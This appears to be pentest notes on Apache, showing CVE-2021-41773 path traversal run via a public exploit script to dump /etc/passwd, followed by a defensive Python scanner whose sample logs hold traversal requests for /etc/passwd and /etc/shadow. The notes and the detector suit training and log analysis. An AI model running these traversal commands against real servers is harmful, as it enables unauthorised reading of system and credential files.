Apache

Directories

Webroot

/var/www/html/

Config

  • /etc/apache2/apache2.conf (Ubuntu)

  • /etc/httpd/conf/httpd.conf (CentOS/RHEL/Fedora)

Logs

  • /var/log/apache2/ (Ubuntu)

  • /var/log/httpd/ (CentOS/RHEL/Fedora)

Versions

2.4.49

Apache HTTP Server 2.4.49 is vulnerable to CVE-2021-41773 (path traversal and remote code execution).

# Search for public exploits
$ searchsploit Apache httpd 2.4.49
...
--------------------------------------------------------------------------
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
--------------------------------------------------------------------------

# Create a file with the target's socket
$ echo "192.168.X.245:8000" > web01_ip.txt

# Exploit the target
$ ./50383.sh web01_ip.txt /etc/passwd
http://192.168.X.245:8000
root:x:0:0:root:/root:/bin/bash
...
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh
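
From the defender's side, a traversal request like the one above leaves percent-encoded dot segments in the access logs under the Logs directories listed earlier. The following is an added example, not part of the original page or of the exploit script: it assumes the default common/combined log format, and the sample log lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format (assumed): host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Oct/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.7 - - [12/Oct/2021:10:01:05 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1689',
    '198.51.100.9 - - [12/Oct/2021:10:02:11 +0000] "GET /icons/.%2E/%2e%2e/etc/shadow HTTP/1.1" 403 199',
    '198.51.100.9 - - [12/Oct/2021:10:02:30 +0000] "GET /docs/v2.4%2e49/notes.html HTTP/1.1" 200 512',
]

def traversal_segments(target):
    """Return raw path segments that only become '..' after percent-decoding."""
    path = target.split("?", 1)[0]
    return [seg for seg in path.split("/")
            if "%2e" in seg.lower() and unquote(seg) == ".."]

def scan(lines):
    """Flag requests with encoded dot segments and record whether they were served."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        segs = traversal_segments(m["target"])
        if not segs:
            continue  # an encoded dot inside a longer name is not a traversal
        status = int(m["status"])
        findings.append({
            "host": m["host"],
            "target": m["target"],
            "status": status,
            "depth": len(segs),             # number of encoded '..' segments
            "served": 200 <= status < 300,  # 2xx: content was returned, triage first
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with `served` set to true are the ones where the server returned content for the traversed path and should be investigated first; a 403 indicates the request was attempted but denied.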
